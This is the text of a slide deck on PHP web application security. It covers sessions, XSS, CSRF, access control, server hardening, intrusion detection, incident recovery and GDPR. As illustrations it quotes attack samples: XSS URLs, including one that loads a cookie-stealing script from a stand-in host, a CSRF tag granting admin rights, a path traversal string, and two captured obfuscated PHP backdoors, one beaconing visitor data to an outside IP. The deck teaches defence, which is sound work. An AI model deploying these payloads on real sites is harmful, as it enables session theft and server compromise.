Change session on login using session_regenerate_id(true)
Do not share sessions between sites/subdomains
Do not accept sessions not generated by your code
Foreign session → remove the session cookie from the user
Regenerate session regularly using session_regenerate_id(true)
Use HTTPS
session.cookie_secure = true
All of the above help against session fixation AND session
hijacking !
50. XSS – Cross Site Scripting
<?php
addMessage($_GET['id'], $_GET['message']);
echo 'Thank you for submitting your message : ' . $_GET['message'];
URL : /submitMessage
http://www.our-app.com/submitMessage?id=5&message=<script>alert('Fun eh ?')</script>
51. XSS – more advanced
http://www.our-app.com/submitMessage?id=5&message=Thanks, we will be in
touch soon.<script type="text/javascript" src="http://someplace.io/i-will-get-your-
cookie.js"></script>
53. XSS : Non-persisted vs persistent
Previous examples were non-persistent : issue occurs once
Post code to exploitable bulletin board
→ Persistent
→ Can infect every user
→ If you stored it without filtering, you're responsible for escaping on
output !
54. XSS : how to avoid
Filter input, escape output
<?php
echo 'I just submitted this message : ' .
htmlentities($_GET['message'], ENT_QUOTES, 'UTF-8', false);
55. CSRF : Cross Site Request Forgery
www.our-app.com
1
Submit article
for review
2
Retrieve articlefor review
3
Evil html or jsmakes call
4
Devil uses extra
privileges
Here's the article you were asking for.
<img src=”http://www.our-app.com/userSave.php?username=Devil&admin=1” />
56. CSRF : ways to avoid
Escape the output (where did we hear that before ?)
Add a field to forms with a random hash/token for verification
upon submit
Check the referer header
<form method="post" action="userSave.php">
<input name="id" type="hidden" value="5" />
<input name="token" type="hidden" value="a4gjogaihfs8ah4gisadhfgifdgfg" />
rest of the form
</form>
57. General rules – input validation
Assume all data you receive as input
contains a hack attempt !
That includes data from trusted users
→ over 90% of hacks are done by employees/partners/...
Filter on disallowed characters
Check validity of
Dates
Email addresses
URLs
etc.
Input validation is not browser-side code, it's server-side code
(you can ofcourse use browser-side code to make it look good)
58. General rules – validation or filtering ?
Validation :
Verify if the values fit a defined format
Examples :
expecting int, but received 7.8 → “error, 7.8 is not a valid integer”
expecting international phone number, but received “+32 3 844 71 89”
Filtering / sanitizing :
Enforce the defined format by converting to it
Examples :
expecting int, but received 7.8 → 8
expecting int, but received 'one' → 0
Both have (dis)advantages
59. General rules – escaping output
Doing input validation → why do you need output escaping ?
What if the data originates from
a webservice
an XML feed
…
Always escape output !
60. Clickjacking
Do you want to
support
our cause ?
NoSure
Do you want to
delete all your
Facebook
friends ?
Yes No
FB button
62. Bad authentication / authorization layer
index.php
(checks cookie)
login.php
(sets cookie)
redirect
to login
main.php
redirect
to main
63. Bad authentication / authorization layer
index.php
(checks cookie)
login.php
(sets cookie)
redirect
to login
main.php
(doesn't check
cookie !)
redirect
to main
64. Bad authentication / authorization layer
Only hiding URLs on view, not restricting on action
/somewhere is visible on screen
/somewhere/admin is not visible, but is accessible
Allowing direct access to other user's data (= insecure direct
object reference)
/user/profile/id/311 is the user's profile
/user/profile/id/312 is also accessible and updateable
Allowing direct access to file downloads with guessable urls
/download/file/83291.pdf
Creating cookies :
loggedin=1
userid=312
admin=1
65. Protecting your web stack
PHP
Webserver
Database server
Mail server
Other servers
Firewalls
...
66. Protecting your web stack - PHP
Update to the latest version (5.4 = EOL, 5.5 will be EOL this
year)
Safe_mode = dead → use PHP-FPM or VMs
Register_globals = dead :-)
Suhosin patch → mostly for web hosting companies
Disable 'dangerous' PHP functions you don't need in php.ini
system
exec
passthru
'Eval' is not a function, so can not be disabled
67. Protecting your web stack – PHP code
If you allow uploads, restrict extensions. No .php, .phtml !
Don't show errors...
68. Protecting your web stack – PHP code
If you allow uploads, restrict extensions. No .php, .phtml !
Don't show errors...
...and don't show exceptions, but...
…log them ! And watch your logs ;-)
If you use filenames as parameters
download.php?filename=test.pdf
Make sure you don't allow ../../../../etc/passwd
Use basename() and pathinfo() to restrict
File extensions :
Use .php
Don't use .inc, .conf, .include, ...
69. Detecting / blocking hack attempts from PHP
2 options :
Build your own
Use an existing system
CAPTCHA
IDS
70. Building a simple system
Add an input field that's hidden from view (bots will fill it out)
Implement a captcha
Limit number of attempts on captcha
Limit number of posts to certain URL
71. Limiting number of posts to a URL
function isUserBlocked($userId) {
$submissions = $memcache->get('submissions_' . $userId);
if ($submissions->getResultCode() == Memcached::RES_NOTSTORED) {
$submissions = array();
}
$now = new DateTimeImmutable();
if (count($submissions) == 10) {
if (new DateTime($submissions[9]) > $now->modify('-1 hour')) {
return false;
}
unset($submissions[9]);
}
array_unshift($submissions, $now->format(DateTime::ATOM));
$memcache->set('submissions_' . $userId, $submissions);
return true;
}
72. Using an existing system
PHPIDS :
The standard IDS for PHP
More complete
Exposé :
By @enygma (Chris Cornutt)
Faster
Use the same ruleset
Provides impact value =
level of trust in data
$data = array(
'POST' => array(
'test' => 'foo',
'bar' => array(
'baz' => 'quux',
'testing' => '<script>test</script>'
)
)
);
$filters = new ExposeFilterCollection();
$filters->load();
$logger = new ExposeLogMongo();
$manager = new ExposeManager($filters, $logger);
$manager->run($data);
// should return 8
echo 'impact: '.$manager->getImpact()."n";
73. Protecting your web stack – Passwords
Don't md5() → sha512, blowfish, …
Set a good password policy
Min 8 chars, min 1 number, min 1 uppercase char, …
Reasonable maximum length (> 20)
→ Hashed result is always the same length, so restricting is insecure
Try to avoid password hints
→ Email is better for recovery
Don't create your own password hashing algorithm !
Use password_hash
5.5+ : built-in
< 5.5 : ircmaxell/password-compat
75. Rehashing old passwords from md5() or sha1()
$stmt = $db->prepare('SELECT * FROM user where email=:email');
$stmt->execute(':email' => $email));
$userRow = $stmt->fetch(PDO::FETCH_ASSOC);
if ($stmt->rowCount() > 0)
if (password_verify($password, $hash) || $userRow['pass'] == md5($password)){
// password_needs_rehash will return true when presented with unknown hash
if (password_needs_rehash($hash, PASSWORD_DEFAULT)) {
$newhash = password_hash($password, PASSWORD_DEFAULT);
$stmt = $db->prepare('UPDATE user SET pass=:pass WHERE email=:email');
$stmt->bindparam(':email', $email);
$stmt->bindparam(':pass', $newhash);
$stmt->execute();
}
// Set logged in data in session here, then redirect to logged in page
}
}
echo 'Password incorrect';
Tell users who haven't logged in for a while that their password
will expire in x days
Upon login :
76. 2 factor authentication
Requires an additional verification
Usually on a separate device
Can be one-time, occasional or every time
77. Log everything !
Failed login attempts
→ Lock an account after x number of failed attempts for x minutes
→ Send automated e-mail to account owner
Simultaneous login from multiple locations
Logins from different regions on same day
→ But : beware of VPNs
If possible : every action of a user
Registered user
Anonymous user (link session to IP or Ips)
Log all PHP errors
→ Every error is important
→ If an error is a bug, it should have been fixed already
78. Protecting your web stack – Webserver
Block direct access to upload directories
80. Protecting your web stack – Webserver
Block direct access to upload directories
Allow only access to port 80 and 443 (!)
Disable phpMyAdmin (VPN only if required)
On Apache don't :
AllowOverride All
Options Indexes
Block access to .svn and .git
Block access to composer.lock, composer.json, …
(which should be outside your webroot normally)
84. Protecting your web stack – Webserver
Don't run web server as root
Don't let web server user access anything outside web root
Detect and ban flood/scan attempts in Nginx :
http {
limit_conn_zone $binary_remote_addr zone=conn_limit_per_ip:10m;
limit_req_zone $binary_remote_addr zone=req_limit_per_ip:10m rate=5r/s;
server {
limit_conn conn_limit_per_ip 10;
limit_req zone=req_limit_per_ip burst=10 nodelay;
}
}
86. Protecting your web stack – Versions
Don't expose versions
PHP : expose_php = 0
Apache :
ServerTokens ProductOnly
ServerSignature Off
Nginx
server_tokens off;
87. Protecting your web stack – Database server
No access from the web required
Give it a private IP
Other websites on network ?
→ send traffic over SSL
1 user per DB
1 DB per user
1 DB per application
88. Protecting your web stack – Mail server
Setup SSL for POP3, IMAP, SMTP
Setup DomainKeys
Setup SPF (Sender Policy Framework)
89. Protecting your web stack – DNS server
Possible weak point in architecture
Controls web, MX (mail) records, anti-spam, etc.
DNS hijacking
DNS spoofing
90. Protecting your web stack
Use public/private key pairs for SSH, not passwords
Don't login as root
→ Use sudo for commands that really need it
Allow SSH access only from VPN
Running
Memcached ?
Gearman ?
… ?
→ Block external access
94. Lack of updates
Not updating system packages
Not updating frameworks and libraries
Not just main components
Doctrine
Bootstrap
Javascript libraries
etc.
Not updating webserver software
Not updating database server software
Recently :
Heartbleed (OpenSSL)
Shellshock (Bash)
Ghost (Glibc)
95. Protecting your web stack - firewalls
Separate or on-server
Default policy = deny all
Don't forget IPv6 !!!
Perform regular scans from external location
Use blacklists to keep certain IP ranges out
96. Protect your backups
Should be encrypted with public key
Private key should be stored in 2 separate locations
Backups should never be stored on same server
Backup server should pull backups
97. MySQL : use the binlog
Setup Master-Slave (even if you don’t have a Slave !)
Master creates binlog
Allows recovery to a specific second
Backup the binlogs for 7-10 days
MySQL backup : mysqldump with --opt --single-transaction
(preferably on slave to avoid locking users)
98. First action of a hacker
Make sure they don't lose the access they gained
Create new user → easy to detect
Install a custom backdoor
→ easy to detect with good IDS
Install a backdoor based on installed software
→ Example : start SSHD with different config on different port (remember firewall ?)
→ Harder to detect
→ Kill it... what happens ?
→ Probably restarts via cronjob
99. Using an Intrusion Detection System
Host-based Intrusion Detection System (HIDS)
Network-based Intrusion Detection System (NIDS)
100. Host-based Intrusion Detection System
Scans the file system for changes
New/deleted files
Modified files (based on checksum)
File permission changes
Old systems are standalone :
AIDE, Tripwire, AFICK
Easy to update by hacker, not recommended (unless combined with
backup system)
Intrusion detection by backup
Best Open Source tool = OSSEC
Client-server-based architecture → real-time notification that hacker
can't stop
Centralized updates
105. Decentralized alternative : Samhain
Can be used centralized or standalone
Log to syslog, send email, write to DB
Processing on the client
Improves processing speed
Requires CPU power on client
106. Network-based Intrusion Detection Systems
Snort
Open Source
Supported by Cisco (rules are not free)
Analyzes traffic, blocks malicious traffic
Huge user base, tons of addons
112. What's the problem with public wifi ?
Traffic can be intercepted
Traffic hijacking / injection
Forcing site to use HTTPS fixes it right ?
What if user goes to some other HTTP site and I inject <img
src=”http://yoursite.com/someurl”> ?
→ Session cookies are transmitted over HTTP
Use HSTS
HTTP Strict Transport Security
Tells browser to use only HTTPS connections
Strict-Transport-Security: max-age=expireTime [; includeSubDomains] [;
preload]
Chrome 4+, FF 4+, IE 11+, Opera 12+, Safari 7+
113. One IDS distro to rule them all
Security Onion
Based on Ubuntu
Contains all the IDS tools...
...and much more
114. You've been hacked ! Now what ? (1/4)
Take your application offline
→ Put up a maintenance page (on a different server)
Take the server off the public Internet
Change your SSH keys
Make a full backup
Check for cronjobs
Check access/error/... logs
(And give them to legal department)
Were any commits made from the server ?
→ Your server shouldn't be able to !
115. What a PHP hack might look like
eval(base64_decode('aWYoZnVuY3Rpb25fZXhpc3RzKCdvYl9zdGFydCcpJiYhaXNzZXQoJEdMT0JBTFNbJ3NoX25vJ10pKXskR0
xPQkFMU1snc2hfbm8nXT0xO2lmKGZpbGVfZXhpc3RzKCcvaG9tZS9iaXJkc2FuZC9wdWJsaWNfaHRtbC90ZW1wL1VQU0Nob2ljZTFf
OF8zXzEvY2F0YWxvZy9pbmNsdWRlcy9sYW5ndWFnZXMvZW5nbGlzaC9tb2R1bGVzL3NoaXBwaW5nL3N0eWxlLmNzcy5waHAnKSl7aW
5jbHVkZV9vbmNlKCcvaG9tZS9iaXJkc2FuZC9wdWJsaWNfaHRtbC90ZW1wL1VQU0Nob2ljZTFfOF8zXzEvY2F0YWxvZy9pbmNsdWRl
cy9sYW5ndWFnZXMvZW5nbGlzaC9tb2R1bGVzL3NoaXBwaW5nL3N0eWxlLmNzcy5waHAnKTtpZihmdW5jdGlvbl9leGlzdHMoJ2dtbC
cpJiYhZnVuY3Rpb25fZXhpc3RzKCdkZ29iaCcpKXtpZighZnVuY3Rpb25fZXhpc3RzKCdnemRlY29kZScpKXtmdW5jdGlvbiBnemRl
Y29kZSgkUjIwRkQ2NUU5Qzc0MDYwMzRGQURDNjgyRjA2NzMyODY4KXskUjZCNkU5OENERThCMzMwODdBMzNFNEQzQTQ5N0JEODZCPW
9yZChzdWJzdHIoJFIyMEZENjVFOUM3NDA2MDM0RkFEQzY4MkYwNjczMjg2OCwzLDEpKTskUjYwMTY5Q0QxQzQ3QjdBN0E4NUFCNDRG
ODg0NjM1RTQxPTEwOyRSMEQ1NDIzNkRBMjA1OTRFQzEzRkM4MUIyMDk3MzM5MzE9MDtpZigkUjZCNkU5RTQxKSsxO31pZigkUjZCNk
U5OENERThCMzMwODdBMzNFNEQzQTQ5N0JEODZCJjE2KXskUjYwMTY5Q0QxQzQ3QjdBN0E4NUFCNDRGODg0NjM1RTQxPXN0cnBvcygk
UjIwRkQ2NUU5Qzc0MDYwMzRGQURDNjgyRjA2NzMyODY4LGNocigwKSwkUjYwMTY5Q0QxQzQ3QjdBN0E4NUFCNDRGODg0NjM1RTQxKS
sxO31pZigkUjZCNkU5OENERThCMzMwODdBMzNFNEQzQTQ5N0JEODZCJjIpeyRSNjAxNjlDRDFDNDdCN0E3QTg1QUI0NEY4ODQ2MzVF
NDErPTI7fSRSQzRBNUI1RTMxMEVENEMzMjNFMDRENzJBRkFFMzlGNTM9Z3ppbmZsYXRlKHN1YnN0cigkUjIwRk...'));
117. What a PHP hack might look like
$GLOBALS['_226432454_']=Array();
function _1618533527($i)
{
return '91.196.216.64';
}
$ip=_1618533527(0);
$GLOBALS['_1203443956_'] = Array('urlencode');
function _1847265367($i)
{
$a=Array('http://','/btt.php?
ip=','REMOTE_ADDR','&host=','HTTP_HOST','&ua=','HTTP_USER_AGENT','&ref=','HTTP_REFERER');
return $a[$i];
}
$url = _1847265367(0) .$ip ._1847265367(1) .$_SERVER[_1847265367(2)] ._1847265367(3) .
$_SERVER[_1847265367(4)] ._1847265367(5) .$GLOBALS['_1203443956_'][0]($_SERVER[_1847265367(6)])
._1847265367(7) .$_SERVER[_1847265367(8)];
$GLOBALS['_399629645_']=Array('function_exists', 'curl_init', 'curl_setopt', 'curl_setopt',
'curl_setopt', 'curl_exec', 'curl_close', 'file_get_contents');
function _393632915($i)
{
return 'curl_version';
}
118. What a PHP hack might look like - location
Changes to .htaccess
Files in upload directory
PHP code in files with different extension
New modules/plugins for Drupal/Wordpress
119. You've been hacked ! Now what ? (2/4)
Search system
preg_replace
base64_decode
eval
system
exec
passthru
Search system and database
script
iframe
120. You've been hacked ! Now what ? (3/4)
Find out how the hack happened ;-)
Write an apology to your customers
Finally :
Reinstall the OS (from scratch !)
Update all packages to the latest version
Don't reinstall code from backup !
Install source code from versioning system
Restore DB from previous backup (use binary log file)
121. Restoring your database to a specific point
Turn on binary log
Usually for master-slave replication
Useful for fast recovery
Make sure it can handle >24h of data
Make a daily database backup
Make a db dump to a file (mysqldump, …)
Warning : locking danger → do this on the slave !
Backup the db dump file
To recover :
Restore the db dump file
Disable db access (webserver, internal users, phpMyAdmin, ...)
Import db dump file to db
Replay binary log (mysqlbinlog …)
122. You've been hacked ! Now what ? (4/4)
Install IDS
Get an external security audit on the code
Get an external security audit on the system/network setup
Change user passwords
Relaunch
Cross your fingers
123. Side note : GDPR
General Data Protection Regulation
New European privacy law
1 law for all member states
Takes effect May 25, 2018
Fines for data loss of up to
4% of annual turnover
or
20 million Euros
(whichever is higher)
124. GDPR – what is private data ?
Anything that identifies a private individual
A unique name
‘Mike Johnson’ is not very unique, but combined with other things it is
‘Wim Godden’ is
An e-mail address
An IP address
A combination of data
Order + address
...
125. GDPR – basic guidelines
Privacy by design
Security by design
Only store the private data that you really need
Procedures must be created for how data is :
Stored
Processed
Deleted
Backed up
These procedures will serve as a way to prove you’ve done all
you can
126. Takeaways
Think like a hacker
Can I steal data ? Can I DOS the site ?
Which techniques could I use to do it ?
Try it without looking at the code
Try it while looking at the code
Use SSL/HTTPS everywhere !
Block all traffic, then allow only what's needed
Sanitize/filter your input
Escape your output
Block flooders/scanners
Use an IDS
Never trust a hacked system
Prepare for GDPR
128. The software discussed (and more)
Password use in PHP
5.5+ : password_hash function : http://php.net/password_hash
< 5.5 : password_compat :
https://github.com/ircmaxell/password_compat
SSL certificates
RapidSSL FreeSSL : https://www.freessl.com/
Let's Encrypt (free) : https://letsencrypt.org/
StartSSL : https://www.startssl.com
Block access to .svn and .git :
http://blogs.reliablepenguin.com/2014/06/26/block-access-git-svn-fol
129. The software discussed (and more)
Webserver flood/scan detection
Nginx : http://nginx.com/resources/admin-guide/restricting-access/
Multi-webserver : http://www.fail2ban.org
Proxy-based :
http://www.ecl-labs.org/2011/03/17/roboo-http-mitigator.html
Protecting your mail server
SPF and DomainKeys :
http://www.pardot.com/faqs/administration/adding-spf-domainkeys-dns/
DNS
Hijacking : http://www.gohacking.com/dns-hijacking/
Spoofing :
http://www.windowsecurity.com/articles-tutorials/authentication_and_encryptio
IPv6 – don't forget to firewall it the same way :
https://www.sixxs.net/wiki/IPv6_Firewalling
130. The software discussed (and more)
Slow HTTP DOS attacks :
https://www.acunetix.com/blog/articles/slow-http-dos-attacks-mitigate
IDS
PHP
PHPIDS : https://github.com/PHPIDS/PHPIDS
Exposé : https://github.com/enygma/expose
Host-based
OSSEC : www.ossec.net
Samhain : http://www.la-samhna.de/samhain/
AIDE : http://aide.sourceforge.net/
Network-based
Snort : https://www.snort.org/
Sirucata : http://suricata-ids.org/
All in one : Security Onion : http://blog.securityonion.net/
131. The software discussed (and more)
Penetration testing live CD :
Backtrack Linux : http://www.backtrack-linux.org/
Kali Linux : https://www.kali.org/
Automatic scanning tools :
Nessus : http://www.tenable.com/products/nessus-vulnerability-scanner
Wapiti : http://wapiti.sourceforge.net/
Nexpose : http://www.rapid7.com/products/nexpose/
Web App Scanning / Auditing :
w3af : http://w3af.org/
Wapiti : http://wapiti.sourceforge.net/
Nikto2 : https://cirt.net/nikto2
134. In case you're interested
Tutorial : 2,5h - 3h
Training : 2 days
1,5 days of interactive training (partly slides, partly hands-on)
Try out different security issues
Experiment on local virtualboxes and physical machines we bring along
0,5 day of auditing
Your code
Your servers
Your network
As a global team effort or in smaller teams
More details : https://cu.be/training